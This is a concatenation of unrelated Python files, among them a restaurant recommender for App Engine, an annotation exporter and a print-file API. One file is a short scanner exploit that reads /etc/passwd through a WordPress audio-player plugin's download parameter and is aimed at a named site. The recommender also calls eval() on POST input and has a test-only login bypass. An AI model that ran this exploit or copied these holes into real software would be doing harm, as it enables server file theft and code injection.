r = fire_query_to_chatbot(q)
content = r.read().decode('utf-8')
# print('content:\n', content)
flag = 'Nothing' in content
if flag:
print('failure')
with open('error_log', 'a') as f:
f.write(q)
f.write('\n ------------ \n')
f.close()
else:
good_counter = good_counter + 1
print('good counter', good_counter)
verified_questions.append(q)
with open('verified_questions', 'a') as f:
f.write(q)
f.write('\n')
f.close()
with open('test_log', 'a') as f:
f.write('question:\n' + q)
f.write('\nresult:\n' + content)
f.write('\n ------------ \n')
f.close()
print('flag', flag)
print('---------------')
time.sleep(1)
# http://127.0.0.1:5000/query_wolfram?question=%C2%A0%20mass%20of%20aromatic%20hydrocarbons
# ---- next file: {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/settings.py ----
"""
Global settings for project.
May be just some literals, or path-related values.
{%- if cookiecutter.use_environment_based_settings %}
All environment-based settings should be declared here too.
{%- endif %}
"""
import pathlib
{%- if cookiecutter.use_environment_based_settings %}
from dotenv import load_dotenv # type: ignore
from environs import Env
load_dotenv()
env = Env()
env.read_env()
{%- endif %}
BASE_DIR = pathlib.Path(__file__).resolve().parent
# ---- next file: explicates/exporter.py ----
# -*- coding: utf8 -*-
"""Exporter module."""
import json
import string
import tempfile
import zipfile
import unidecode
from flask import current_app
from sqlalchemy import and_
from werkzeug.utils import secure_filename
from werkzeug.datastructures import FileStorage
from explicates.core import repo, db
from explicates.model.annotation import Annotation
from explicates.model.collection import Collection
class Exporter(object):
def _stream_annotation_data(self, collection):
"""Stream the contents of an AnnotationCollection from the database."""
table = Annotation.__table__
where_clauses = [
table.c.collection_key == collection.key,
            table.c.deleted.isnot(True)  # use isnot(); a bare Python "is not" cannot build a SQL clause
]
query = table.select().where(and_(*where_clauses))
exec_opts = dict(stream_results=True)
res = db.session.connection(execution_options=exec_opts).execute(query)
while True:
chunk = res.fetchmany(10000)
if not chunk:
break
for row in chunk:
yield dict(row)
def generate_data(self, collection_id):
"""Return all Annotations as JSON-LD."""
collection = repo.get_by(Collection, id=collection_id)
data_gen = self._stream_annotation_data(collection)
first = True
yield '['
for row in data_gen:
anno = Annotation(**dict(row))
anno.collection = collection
anno_dict = anno.dictize()
out = json.dumps(anno_dict)
yield out if first else ', ' + out
first = False
yield ']'
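# A minimal usage sketch (not part of the original module): because
# generate_data() is a generator, it can be streamed straight into a response
# without materialising every Annotation in memory. Assuming a Flask view and
# `from flask import Response`:
#
#   exporter = Exporter()
#   return Response(exporter.generate_data(collection_id),
#                   mimetype='application/json')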
# ---- next file ----
import logging
import webapp2
import json
import logic
from models import Rating, PFuser, ClusterRating, Place, Discount
from google.appengine.api import memcache, taskqueue
from datetime import datetime
def put_user_in_cluster(user):
ratings = Rating.get_list({'user': user.key.id()})
rlist = {}
for rating in ratings:
if rating.not_known is False and rating.value > 0:
place = rating.place.urlsafe()
rlist['%s-%s' % (place, rating.purpose)] = rating.value
ruser = {'ratings': rlist}
centroids = {}
cratings = ClusterRating.get_list({})
for rating in cratings:
if rating.cluster_id not in centroids:
centroids[rating.cluster_id] = {'key': rating.cluster_id, 'ratings': {}}
if rating.avg_value > 0:
place = rating.place.urlsafe()
centroids[rating.cluster_id]['ratings']['%s-%s' % (place, rating.purpose)] = rating.avg_value
max_sim = 0
cluster_id = None
for clid in centroids:
sim = logic.similarity(ruser, centroids[clid])
if sim >= max_sim:
max_sim = sim
cluster_id = clid
user.cluster_id = cluster_id
user.put()
return cluster_id
from math import radians, cos, sin, asin, sqrt
def distance(lat1, lon1, lat2, lon2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees), using the haversine formula
Returns distance in meters
"""
# logging.info('recommender.distance START : lat1=' + str(lat1) +
# " - lon1=" + str(lon1) + " - lat2=" + str(lat2) + " - lon2=" + str(lon2))
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
c = 2 * asin(sqrt(a))
meters = 6367000 * c
# logging.info('recommender.distance END - ' + str(meters))
return meters
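# Illustrative sanity check for the haversine above (added example, not part of
# the original module; the coordinates and the ~77 m figure are approximate):
def _distance_example():
    # identical points give exactly 0.0
    zero = distance(46.0, 11.0, 46.0, 11.0)
    # at latitude 46 N, a 0.001-degree shift in longitude is roughly
    # 6367000 * radians(0.001) * cos(radians(46)) ~= 77 metres
    approx_77_m = distance(46.0, 11.0, 46.0, 11.001)
    return zero, approx_77_m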
def load_data(filters):
"""
It loads data from datastore.
Filters:
- users: array of user ids (the users within user cluster)
- places: array of palce ids (the places that satisfy user's location parameters)
- purpose: the purpose we are interested in
if filters is None, it loads all ratings in the datastore
"""
# logging.info('recommender.load_data START - filters=' + str(filters))
ratings, status, errcode = logic.rating_list_get(filters)
if status != "OK":
logging.error(str(errcode) + ": " + status)
return None
# map: user - place - purpose --> value
data = {}
for rating in ratings:
if rating.not_known is False and rating.value > 0:
user = rating.user.id()
place = rating.place.urlsafe()
if user not in data:
data[user] = {}
if place not in data[user]:
data[user][place] = {}
data[user][place][rating.purpose] = rating.value
# logging.info('recommender.load_data END - data users: ' +
# str(len(data)) + ' -- ratings: ' + str(len(ratings)))
return data
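# Shape of the value returned by load_data (illustrative placeholder ids/keys,
# not real data): a nested map user id -> place key -> purpose -> rating, e.g.
#   {1234567890: {'<urlsafe-place-key>': {'romantic dinner': 4,
#                                         'dinner with friends': 3}}}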
def cluster_based(user_id, places, purpose='dinner with tourists', np=5, loc_filters = None):
"""
It computes cluster-based recommendations.
Clusters have been already computed, so only user's cluster information is needed to compute predictions for the user.
Input:
- user: the id of the requester
- places: the list of places that can be recommended
- purpose: the purpose the user is interested in
- np: the number of recommendations the user needs
Result:
- list of np tuples (score, place_key), where score is the predicted rating for the user and place_key is the key of the palce to which it refers to
- None if the clusters cannot be computed (no ratings in the system)
"""
logging.info('kmeans.cluster_based START - user=' +
str(user_id) + ', places: '+str(len(places))+', purpose:' + str(purpose) + ', np=' + str(np))
client = memcache.Client()
purpose_str = purpose.replace(' ', '-')
rec_name = 'cluster-scores_' + str(user_id) + '_' + purpose_str
# memcache_scores is a dict containing:
# - scores: list of items and scores
# - purpose
# - lat
# - lon
# - max_dist
memcache_scores = client.get(rec_name)
logging.info("CLUSTER SCORES from memcache: " + str(memcache_scores) + ' -- ' + str(loc_filters))
memcache_valid = False
if memcache_scores is not None and 'purpose' in memcache_scores and memcache_scores['purpose'] == purpose:
if loc_filters is not None and 'lat' in loc_filters:
if 'lat' in memcache_scores and 'lon' in memcache_scores and 'max_dist' in memcache_scores:
diff_lat = memcache_scores['lat'] - loc_filters['lat']
diff_lon = memcache_scores['lon'] - loc_filters['lon']
if diff_lat < 0.0002 and diff_lat > -0.0002 and diff_lon < 0.0002 and diff_lon > -0.0002 and memcache_scores['max_dist'] >= loc_filters['max_dist']:
memcache_valid = True
# else:
# memcache_valid = True
if memcache_valid:
logging.info("CLUSTER SCORES loaded from memcache")
scores = memcache_scores['scores']
scores = sorted(scores, key=lambda x: x[0], reverse = True)
else:
user = PFuser.get_by_key(PFuser.make_key(user_id, None))
if user.cluster_id is None or len(user.cluster_id) < 1:
user.cluster_id = put_user_in_cluster(user)
if user.cluster_id is None or len(user.cluster_id) < 1:
logging.error("The system is not able to put the user in a cluster!")
return None
logging.info("USER %s is in cluster %s" % (user_id, user.cluster_id))
filters = {'cluster_id': user.cluster_id, 'purpose': purpose}
if places is not None:
filters['places'] = places
avg_ratings = ClusterRating.get_list(filters)
logging.info("Loaded cluster ratings: " + str(len(avg_ratings)))
del filters['cluster_id']
filters['user'] = user_id
user_ratings = Rating.get_list(filters)
logging.info("Loaded user ratings: " + str(len(user_ratings)))
scores = []
for cr in avg_ratings:
for ur in user_ratings:
if cr.avg_value < 3.0:
#skip this place, too low rating
continue
if cr.place == ur.place and ur.value <3.0:
#skip this place, user doesn't like it
continue
already_stored = False
prev_value = None
cr_key = cr.place.urlsafe()
for value, key in scores:
if key == cr_key:
already_stored = True
prev_value = value
        if already_stored:
          if cr.avg_value > prev_value:
            logging.info("Found same place with two different values!! (%s, %s, %s)",
                         cr_key, prev_value, cr.avg_value)
            # keep only the higher of the two scores for this place
            scores.remove((prev_value, cr_key))
            scores.append((cr.avg_value, cr_key))
          # either way, skip the plain append below to avoid duplicate entries
          continue
        scores.append((cr.avg_value, cr_key))
scores = sorted(scores, key=lambda x: x[0], reverse = True)
logging.info("Scores: " + str(len(scores)))
#save scores in memcache
purpose_str = purpose.replace(' ', '-')
rec_name = 'cluster-scores_' + str(user) + '_' + purpose_str
memcache_scores = {}
memcache_scores['scores'] = scores
memcache_scores['purpose'] = purpose
if loc_filters is not None and 'lat' in loc_filters:
memcache_scores['lat'] = loc_filters['lat']
memcache_scores['lon'] = loc_filters['lon']
memcache_scores['max_dist'] = loc_filters['max_dist']
logging.info("CLUSTER SCORES saving in memcache ")# + str(memcache_scores))
client.set(rec_name, memcache_scores)
res = scores[0:np]
logging.info('kmeans.cluster_based END - res: ' + str(res))
return res
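# Example of the value returned by cluster_based (placeholder keys/scores):
# a list of at most `np` (predicted score, urlsafe place key) tuples, already
# sorted by score, e.g. [(4.5, '<place-key-1>'), (3.9, '<place-key-2>')].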
def recommend(user_id, filters, purpose='dinner with tourists', n=5):
"""
It computes the recommendations for the user, according to specified filters and parameters.
When possible, the recommendation list is personalized, using the cluster-based algorithm.
If the personalized algorithm fails to find the required number of recommended place, an average-based
non-personalized recommendation algorithm is used.
If still other places are needed, the recommendation list is filled with places ordered by distance from user.
Input:
- user_id: is of the requester
- filters: filters for places of interest for the user
- purpose: the purpose the user is interested in
- n: number of recommended places requested by the user
Available filters:
//- 'city': 'city!province!state!country'
The 'city' filter contains the full description of the city, with values separated with a '!'.
This string is split and used to retrieve only the places that are in the specified city.
'null' is used if part of the full city description is not available [example: 'Trento!TN!null!Italy'
or if a bigger reagion is considered [example: 'null!TN!null!Italy' retrieves all places in the province of Trento]
- 'lat', 'lon' and 'max_dist': lat and lon indicates the user position, while max_dist is a measure expressed in meters
and represnt the radius of the circular region the user is interested in.
Returns a list of n places in json format
"""
logging.info("recommender.recommend START - user_id=" + str(user_id) +
', filters=' + str(filters) + ', purpose=' + str(purpose) + ', n=' + str(n))
# places is already a json list
start = datetime.now()
user_max_dist = None
if filters is not None and 'max_dist' in filters and filters['max_dist'] is not None and filters['max_dist'] > 0:
user_max_dist = filters['max_dist']
#get places for a larger area
filters['max_dist'] = 2 * user_max_dist
places, status, errcode = logic.place_list_get(filters, user_id)
logging.info("RECOMMEND places loaded ")
if status != "OK" or places is None or len(places) < 1:
# the system do not know any place within these filters
logging.info("recommender.recommend END - no places")
logging.error(str(errcode) + ": " + status)
return None
logging.warning("Loaded places for double distance: " + str(datetime.now() - start))
start = datetime.now()
closest = []
out_distance = []
for p in places:
if 'lat' in filters and 'lon' in filters and filters['lat'] is not None and filters['lon'] is not None:
# add distance to user for each place
p['distance'] = distance(
p['address']['lat'], p['address']['lon'], filters['lat'], filters['lon'])
if p['distance'] is not None and user_max_dist is not None and p['distance'] <= user_max_dist:
closest.append(p)
else:
out_distance.append(p)
if len(closest) >= n:
places = closest
elif len(closest) == 0:
places = out_distance
else:
#TODO: fill missing spaces with outliers?
places = closest
logging.warning("removing places that are too far: " + str(datetime.now() - start))
place_ids = []
if places is not None:
place_ids = [Place.make_key(None, place['key']).id() for place in places]
scores = None
purpose_list = ["dinner with tourists", "romantic dinner", "dinner with friends", "best price/quality ratio"]
start = datetime.now()
# logging.warning("RECOMMEND START get cluster-based predictions for all purposes: " + str(start))
for p in purpose_list:
if p == purpose:
start2 = datetime.now()
scores = cluster_based(user_id, place_ids, p, n, loc_filters=filters)
logging.warning("RECOMMEND END get cluster-based predictions: " + str(datetime.now()-start2))
else:
q = taskqueue.Queue('recommendations')
task = taskqueue.Task(params={'user_id': user_id, 'place_ids': place_ids, 'purpose': p, 'n': n, 'loc_filters': str(filters)},
url='/recommender/compute_cluster_based', method='POST', countdown=10)
q.add(task)
logging.warning("Getting recommendations from cluster and starting computation for other purposes: " + str(datetime.now() - start))
log_text = "RECOMMEND scores from cluster-based : "
if scores is None:
log_text += "None"
else:
log_text += str(len(scores))
logging.info(log_text)
start = datetime.now()
if scores is None or (len(scores) < n and len(scores) < len(places)):
# cluster-based recommendation failed
# non-personalized recommendation
rating_filters = {}
if places is not None:
rating_filters['places'] = place_ids
rating_filters['purpose'] = purpose
ratings = load_data(rating_filters)
if ratings is None:
logging.info("ratings for places: None")
else:
logging.info("ratings for places: " + str(len(ratings)))
items = {}
if ratings is not None:
for other in ratings:
if other != user_id:
for item in ratings[other]:
if purpose in ratings[other][item]:
if item not in items.keys():
items[item] = []
items[item].append(ratings[other][item][purpose])
avg_scores = [(sum(items[item]) / len(items[item]), item)
for item in items]
logging.info("avg_scores: " + str(len(avg_scores)))
filters = {'purpose': purpose, 'user': user_id}
if places is not None:
filters['places'] = place_ids
user_ratings = Rating.get_list(filters)
logging.info("Loaded user ratings: " + str(len(user_ratings)))
if scores is None:
scores = []
for value, key in avg_scores:
toadd = True
for ur in user_ratings:
if value < 3.0:
#skip this place, too low rating
toadd = False
continue
if key == ur.place.urlsafe() and ur.value < 3.0:
#skip this place, user doesn't like it
toadd = False
continue
for svalue, skey in scores:
if key == skey:
#already in list because of cluster
toadd = False
break
if toadd:
scores.append((value, key))
logging.info("Appending place with value " + str(value))
if len(scores) >= n:
# we have enough recommended places
break
scores = sorted(scores, key=lambda x: x[0], reverse = True)
if len(scores) > n:
scores = scores[0:n]
# if debug:
# log_text = "RECOMMEND scores from average-based : "
# if scores is None:
# log_text += "None"
# else:
# log_text += str(len(scores))
# logging.info(log_text)
#
# if scores is None or (len(scores) < n and len(scores) < len(places)):
# # cluster-based and average recommendations both failed to fill the recommendation list
# # just add some other places
# for p in places:
# in_list = False
# for score, key in scores:
# if key == p['key']:
# in_list = True
# break
# if not in_list:
# scores.append((0, p['key']))
# if len(scores) >= n:
# # we have enough recommended places
# break
#
# if debug:
# log_text = "RECOMMEND final scores : "
# if scores is None:
# log_text += "None"
# else:
# log_text += str(len(scores))
# logging.info(log_text)
logging.warning("Filling empty space with full average predictions: " + str(datetime.now() - start))
start = datetime.now()
places_scores = []
for p in places:
# found = False
for (score, item) in scores:
if item == p['key']:
places_scores.append((score, p))
# found = True
# if not found:
# places_scores.append((0, p))
logging.info('places_scores: ' + str(len(places_scores)))
places_scores = sorted(places_scores, key=lambda x: x[0], reverse = True)
logging.warning("Moving mapping from place ids to full place data: " + str(datetime.now() - start))
if len(places_scores) > n:
places_scores = places_scores[0:n]
# logging.info('recommender.recommend - places_scores: ' + str(places_scores))
items = []
start = datetime.now()
for (score, place) in places_scores:
#TODO: make discount loading asynchronous in javascript page, after visualization of places!!!
disc_filters = {'place': place['key'], 'published': 'True', 'passed': 'False'}
discounts, status, errcode = logic.discount_list_get(disc_filters, user_id)
logging.info("discounts loaded: " + str(errcode) + " - " + status)
if discounts is not None and status == "OK":
try:
json_discounts = [Discount.to_json(d, None, None) for d in discounts]
place['discounts'] = json_discounts
except (TypeError, ValueError) as e:
#do nothing
logging.error('Discounts not loaded: ' + str(e))
pass
place['predicted'] = score
items.append(place)
logging.warning("Time for loading discounts: " + str(datetime.now() - start))
# logging.info("Recommended items: " + str(items))
logging.info("recommender.recommend END ")#- items: " + str(items))
return items
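# A minimal sketch of a call to recommend() (values are made up; user_id must
# be an existing PFuser id, and max_dist is expressed in metres):
#
#   example_filters = {'lat': 46.07, 'lon': 11.12, 'max_dist': 2000}
#   suggestions = recommend('some-user-id', example_filters,
#                           purpose='romantic dinner', n=5)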
class KmeansRecommendHandler(webapp2.RequestHandler):
def get(self):
auth = self.request.headers.get("Authorization")
if auth is None or len(auth) < 1:
auth = self.request.cookies.get("user")
user_id = logic.get_current_userid(auth)
if user_id is None:
#only for test purposes!!
user_id = self.request.GET.get('userid')
if user_id is None:
self.response.set_status(403)
self.response.write("You must login first!")
return
logging.info('Recommender: ' + str(self.request.GET))
# user = logic.user_get(user_id, None)
# get parameters from GET data
#max_dist is measured in meters
filters = {
'lat': float(self.request.GET.get('lat')),
'lon': float(self.request.GET.get('lon')),
'max_dist': float(self.request.GET.get('max_dist'))
}
purpose = self.request.GET.get('purpose')
num = int(self.request.GET.get('n'))
start= datetime.now()
places = recommend(user_id, filters, purpose=purpose, n=num)
logging.warning("Total time for recommendations: " + str(datetime.now() - start))
if places is None or len(places) == 0:
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps([]))
return
json_list = places
# logging.info(str(json_list))
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(json_list))
class ComputeClusterBasedHandler(webapp2.RequestHandler):
def post(self):
if 'X-AppEngine-QueueName' not in self.request.headers:
logging.info('recommender.RecomputeClustersHandler.get END called not from queue - 403')
# the request is not coming from a queue!!
self.response.set_status(403)
self.response.write("You cannot access this method!!!")
return
logging.info("ComputeClusterBasedHandler")
post_data = self.request.params
logging.info("POST data: " + str(post_data))
place_ids = post_data.getall('place_ids')
place_ids = [long(pid) for pid in place_ids]
filters = eval(post_data.get('loc_filters'))
n = int(post_data.get('n'))
user_id = post_data.get('user_id')
purpose = post_data.get('purpose')
# logging.error("place keys: " + str(place_ids))
# logging.error("loc_filtes: " + str(filters))
# logging.error("n: " + str(n))
# logging.error("user: " + str(user_id))
# logging.error("purpose: " + str(purpose))
cluster_based(user_id, place_ids, purpose, n, loc_filters=filters)
logging.info("ComputeClusterBasedHandler END")
class ManualComputeHandler(webapp2.RequestHandler):
def get(self):
q = taskqueue.Queue('update-clusters-queue')
task = taskqueue.Task(
url='/kmeans/compute_clusters', method='GET', countdown=0, target='cluster')
q.add(task)
app = webapp2.WSGIApplication([
('/recommender/', KmeansRecommendHandler),
('/recommender/compute_cluster_based', ComputeClusterBasedHandler),
('/recommender/compute_clusters_manual', ManualComputeHandler),
], debug=True)
# ---- next file ----
###############################################################################
# Copyright (c) 2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory
# Written by <NAME>, <EMAIL>.
#
# LLNL-CODE-734340
# All rights reserved.
# This file is part of MaestroWF, Version: 1.0.0.
#
# For details, see https://github.com/LLNL/maestrowf.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""Collection of custom adapters for interfacing with various systems."""
import logging
import pkgutil
import inspect
from maestrowf.abstracts.interfaces import ScriptAdapter
__all__ = ("ScriptAdapterFactory",)
LOGGER = logging.getLogger(__name__)
def iter_adapters():
"""
    Based on the packaging.python.org example of looping over a namespace to
    find its modules. It has been adapted to load all (non-abstract) classes
    implementing ScriptAdapter from the modules in maestrowf.interfaces.script.
:return: an iterable of the classes existing in the namespace
"""
# get loader for the script adapter package
loader = pkgutil.get_loader('maestrowf.interfaces.script')
# get all of the modules in the package
mods = [(name, ispkg) for finder, name, ispkg in pkgutil.iter_modules(
loader.load_module('maestrowf.interfaces.script').__path__,
loader.load_module('maestrowf.interfaces.script').__name__ + ".")]
cs = []
for name, _ in mods:
# get loader for every module
m = pkgutil.get_loader(name).load_module(name)
# get all classes that implement ScriptAdapter and are not abstract
for n, cls in m.__dict__.items():
if isinstance(cls, type) and issubclass(cls, ScriptAdapter) and \
not inspect.isabstract(cls):
cs.append(cls)
return cs
class ScriptAdapterFactory(object):
factories = {
adapter.key: adapter for adapter in iter_adapters()
}
@classmethod
def get_adapter(cls, adapter_id):
if adapter_id.lower() not in cls.factories:
msg = "Adapter '{0}' not found. Specify an adapter that exists " \
"or implement a new one mapping to the '{0}'" \
.format(str(adapter_id))
LOGGER.error(msg)
raise Exception(msg)
return cls.factories[adapter_id]
@classmethod
def get_valid_adapters(cls):
return cls.factories.keys()
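# Example lookup (the 'local' key is illustrative; the valid keys depend on
# the ScriptAdapter subclasses discovered by iter_adapters() at import time):
#
#   adapter_cls = ScriptAdapterFactory.get_adapter('local')
#   print(ScriptAdapterFactory.get_valid_adapters())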
# ---- next file: ancilla/ancilla/foundation/node/api/file.py (repo: frenzylabs/ancilla) ----
'''
file.py
ancilla
Created by <NAME> (<EMAIL>) on 01/08/20
Copyright 2019 FrenzyLabs, LLC.
'''
import time
import os, random, string
import asyncio
import math
from .api import Api
from ..events import FileEvent
from ...data.models import PrintSlice
from ..response import AncillaResponse, AncillaError
class FileApi(Api):
# def __init__(self, service):
# super().__init__(service)
# self.setup_api()
def setup(self):
super().setup()
self.service.route('/<file_id>', 'GET', self.get)
self.service.route('/<file_id>/unsync', 'PATCH', self.unsync_layerkeep)
self.service.route('/<file_id>', 'PATCH', self.update)
self.service.route('/<file_id>/sync_layerkeep', 'POST', self.sync_to_layerkeep)
self.service.route('/sync_layerkeep', 'POST', self.sync_from_layerkeep)
self.service.route('/', 'GET', self.list_files)
self.service.route('/', 'POST', self.post)
self.service.route('/<file_id>', 'DELETE', self.delete)
# self.service.route('/', 'DELETE', self.delete)
def unsync_layerkeep(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
print_slice.layerkeep_id = None
print_slice.save()
return {"file": print_slice.json}
# pass
async def update(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
name = request.params.get("name")
description = request.params.get("description")
if name:
print_slice.name = name
if description:
print_slice.description = description
lksync = request.params.get("layerkeep_sync")
if lksync and lksync != 'false':
if print_slice.layerkeep_id:
response = await layerkeep.update_sliced_file({"data": print_slice.json})
if not response.success:
raise response
else:
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
else:
print_slice.layerkeep_id = None
print_slice.save()
return {"file": print_slice.json}
async def post(self, request, layerkeep, *args):
# print(request.files, flush=True)
name = request.params.get("name") or ""
rootname, ext = os.path.splitext(name)
description = request.params.get("description") or ""
incoming = request.files.get('file', [])
if len(incoming) > 0:
incoming = incoming[0]
else:
raise AncillaError(400, {"error": "No File"})
# incoming = request.files['file'][0]
generated_name = rootname + "".join(random.choice(string.ascii_lowercase + string.digits) for x in range(6))
original_name = incoming.get('filename') or incoming.get('name') or f"{generated_name}.txt"
root, ext = os.path.splitext(original_name)
if name == "":
name = original_name
filename = generated_name + ext
filepath = self._path_for_file(filename)
output = open(filepath, 'wb')
output.write(incoming['body'])
output.close()
print_slice = PrintSlice(name=name, generated_name=filename, path=filepath, description=description)
lksync = request.params.get("layerkeep_sync")
if lksync and lksync != 'false':
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
print_slice.save()
self.service.fire_event(FileEvent.created, print_slice.json)
return {"file": print_slice.json}
def list_files(self, request, *args):
page = int(request.params.get("page") or 1)
per_page = int(request.params.get("per_page") or 5)
q = PrintSlice.select().order_by(PrintSlice.created_at.desc())
if request.params.get("q[name]"):
q = q.where(PrintSlice.name.contains(request.params.get("q[name]")))
cnt = q.count()
num_pages = math.ceil(cnt / per_page)
return {"data": [p.to_json(recurse=True) for p in q.paginate(page, per_page)], "meta": {"current_page": page, "last_page": num_pages, "total": cnt}}
def get(self, request, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if request.params.get('download'):
request.response.set_header('Content-Type', 'application/force-download')
request.response.set_header('Content-Disposition', 'attachment; filename=%s' % print_slice.name)
return {"file": print_slice.json}
async def delete(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if print_slice.layerkeep_id:
if request.params.get("delete_remote"):
resp = await layerkeep.delete_sliced_file({"data": {"layerkeep_id": print_slice.layerkeep_id}})
if self.service.delete_file(print_slice):
return {"status": 200}
else:
raise AncillaError(400, {"error": f"Could Not Delete File {print_slice.name}"})
def _path_for_file(self, filename):
return "{}/{}".format(self.service.root_path, filename)
def connect(self, *args):
return self.service.connect()
def disconnect(self, *args):
if self.service.connector:
self.service.stop()
return {"status": "disconnected"}
async def sync_from_layerkeep(self, request, layerkeep, *args):
layerkeep_id = request.params.get("attributes").get("id")
localsf = PrintSlice.select().where(PrintSlice.layerkeep_id == layerkeep_id).first()
if localsf:
return {"file": localsf.json}
name = request.params.get("attributes").get("name")
description = request.params.get("attributes").get("description") or ""
response = await layerkeep.download_sliced_file({"data": request.params})
if not response.success:
raise response
filename = "".join(random.choice(string.ascii_lowercase + string.digits) for x in range(6))
ext = os.path.splitext(name)[1]
filename = filename + ext
filepath = self._path_for_file(filename)
output = open(filepath, 'wb')
output.write(response.body)
output.close()
sf = PrintSlice(name=name, generated_name=filename, path=filepath, layerkeep_id=request.params.get("id"), description=description, source="layerkeep")
sf.save()
self.service.fire_event(FileEvent.created, sf.json)
return {"file": sf.json}
async def sync_to_layerkeep(self, request, layerkeep, file_id, *args):
print_slice = PrintSlice.get_by_id(file_id)
if print_slice.layerkeep_id:
return {"data": print_slice.json}
response = await layerkeep.upload_sliced_file({"data": {"sliced_file": print_slice.json, "params": request.params}})
if not response.success:
raise response
print_slice.layerkeep_id = response.body.get("data").get("id")
print_slice.save()
return {"file": print_slice.json}
# ---- next file ----
import unittest
import file01 as file
class TestBasicCalculation(unittest.TestCase):
def test_check_key(self):
self.assertEqual(file.check_key(-1), False)
self.assertEqual(file.check_key(0), True)
self.assertEqual(file.check_key(1), True)
self.assertEqual(file.check_key(50), True)
self.assertEqual(file.check_key(94), True)
self.assertEqual(file.check_key(95), False)
self.assertEqual(file.check_key('a'), False)
def test_check_upper_lower(self):
self.assertEqual(file.check_upper_lower("The quick Brown Fox!"), [3, 13])
self.assertEqual(file.check_upper_lower("Khoor#Zruog#=,"), [2, 8])
self.assertEqual(file.check_upper_lower("012345"), [0, 0])
def test_encrypt_decrypt_string(self):
self.assertEqual(file.encrypt_decrypt_string("Hello World :)"), "Khoor#Zruog#=,")
self.assertEqual(file.encrypt_decrypt_string("Khoor#Zruog#=,", 3, 2), "Hello World :)")
self.assertEqual(file.encrypt_decrypt_string("Khoor#Zruog#=,", option=2), "Hello World :)")
self.assertEqual(file.encrypt_decrypt_string("Hello World :)", key=100), "Invalid key!")
self.assertEqual(file.encrypt_decrypt_string("Hello World :)", option=4), "Invalid option!")
def test_count_words_in_file(self):
self.assertEqual(file.count_words_in_file("test1.txt"), {'HELLO': 1, 'WORLD': 2, 'HOW': 1, 'ARE': 1, 'YOU': 1, 'DOING': 1, 'I': 1, 'LOVE': 1, 'THIS': 1})
self.assertEqual(file.count_words_in_file("test2.txt"), {'TEST': 3, 'ONE': 2, 'TWO': 1, 'THREE': 1})
self.assertEqual(file.count_words_in_file("test3.txt"), "Wrong file or file path")
def test_summarise_data(self):
self.assertEqual(file.summarise_data("traffic_data.txt", 0), [13096, 6493, 471876, 50, 9437.52])
self.assertEqual(file.summarise_data("traffic_data.txt", 1), [11799, 5778, 421298, 50, 8425.96])
self.assertEqual(file.summarise_data("population_10.txt", 5), [1371851, 1730, 3327840, 34, 97877.65])
self.assertEqual(file.summarise_data("population_10.txt", 6), [1425791, 1878, 4274491, 38, 112486.61])
self.assertRaises(FileNotFoundError, file.summarise_data, "filenotexist.txt", 0)
if __name__ == "__main__":
    unittest.main()
# ---- next file: Bugscan_exploits-master/exp_list/exp-1639.py ----
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#__Author__ = zhiyuan
#___Sertype___ = WordPress wp-miniaudioplayer arbitrary file download vulnerability
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payload = 'wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd'
url = arg + payload
code, head, body, errcode, _url = curl.curl2(url)
if code == 200 and '/root:/bin/bash' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
    audit(assign('wordpress', 'http://baiemusic.fr/')[1])
# ---- next file ----
import sys
import os, os.path
import shutil
if sys.version_info < (3,):
range = xrange
def CheckParameter():
outputPath = None
searchStartDir = None
isIncludeFolder = None
excludePaths = None
count = len(sys.argv)-1
if count >= 8:
for i in range(1, count):
if sys.argv[i] == "-OutputPath":
outputPath = os.path.abspath(sys.argv[i+1])
elif sys.argv[i] == "-SearchStartDir":
searchStartDir = os.path.abspath(sys.argv[i+1])
elif sys.argv[i] == "-IsIncludeFolder":
isIncludeFolder = sys.argv[i+1]
elif sys.argv[i] == "-ExcludePaths":
excludePaths = sys.argv[i+1]
else:
i-=1
i+=1
if isIncludeFolder == "True":
isIncludeFolder = True
elif isIncludeFolder == "False":
isIncludeFolder = False
if excludePaths is not None:
excludePaths = excludePaths.split(',')
        if len(excludePaths) == 1 and excludePaths[0].lower() == 'null':  # compare with '==', not 'is'
excludePaths = None
else:
for i in list(range(0, len(excludePaths))):
excludePaths[i] = os.path.abspath(excludePaths[i])
